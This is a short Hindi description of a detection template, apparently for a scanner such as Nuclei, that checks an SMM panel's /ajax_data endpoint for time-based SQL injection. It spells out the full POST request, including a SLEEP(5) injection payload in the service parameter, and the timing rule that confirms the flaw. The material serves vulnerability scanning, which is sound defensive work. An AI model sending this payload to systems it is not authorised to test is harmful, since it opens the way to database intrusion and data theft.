
SMM पैनल के लिए समय-आधारित SQL इंजेक्शन डिटेक्शन टेम्पलेट, जो /ajax_data पर तैयार POST अनुरोधों के माध्यम से service_detail पैरामीटर को लक्षित करता है, भेद्यता की पुष्टि के लिए प्रतिक्रिया विलंब का उपयोग करता है।
SMM पैनल के लिए समय-आधारित SQL इंजेक्शन पहचान
यह टेम्पलेट, /ajax_data पर HTTP POST अनुरोधों के माध्यम से SMM पैनल के service_detail पैरामीटर में समय-आधारित SQL इंजेक्शन कमज़ोरी का पता लगाता है। इसका दुरुपयोग करके रिमोट हमलावर संवेदनशील डेटा तक पहुँच प्राप्त कर सकते हैं या विशेषाधिकार बढ़ा सकते हैं।
उपकरण एक तैयार POST अनुरोध भेजता है:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
यदि प्रतिक्रिया समय 5 सेकंड से अधिक है, तो यह एक संवेदनशील एंडपॉइंट को इंगित करता है।
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
